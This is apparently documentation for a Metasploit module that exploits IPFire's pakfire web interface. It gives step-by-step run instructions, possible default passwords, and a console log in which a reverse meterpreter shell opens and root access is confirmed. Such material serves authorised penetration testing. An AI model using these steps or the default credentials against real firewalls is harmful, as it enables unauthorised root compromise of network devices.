8e16d4a1c7
Signed-off-by: MucahitSaratar <trregen222@gmail.com>
1.7 KiB
1.7 KiB
Vulnerable Application
Official Source: ipfire Archived Copy: github
Verification Steps
- Install the firewall
- Start msfconsole
- Do:
use exploit/linux/http/ipfire_pakfire_exec - Do:
set password 012345or whatever it was set to at install - Do:
set rhost 192.168.1.100 - Do:
set lhost 192.168.1.106 - Do:
exploit - You should get a shell.
Options
PASSWORD
Password is set at install. May be blank, 'admin', or 'ipfire'.
Scenarios
msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > set password 012345
password => 012345
msf6 exploit(linux/http/ipfire_pakfire_exec) > set rhost 192.168.1.100
rhost => 192.168.1.100
msf6 exploit(linux/http/ipfire_pakfire_exec) > set lhost 192.168.1.106
lhost => 192.168.1.106
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit
[*] Started reverse TCP handler on 192.168.1.106:4444
[*] Sending stage (39392 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.100:55330) at 2021-05-23 19:28:38 +0300
meterpreter > shell
Process 2905 created.
Channel 1 created.
sh: cannot set terminal process group (2900): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.0# hostname
ipfire.localdomain
sh-5.0#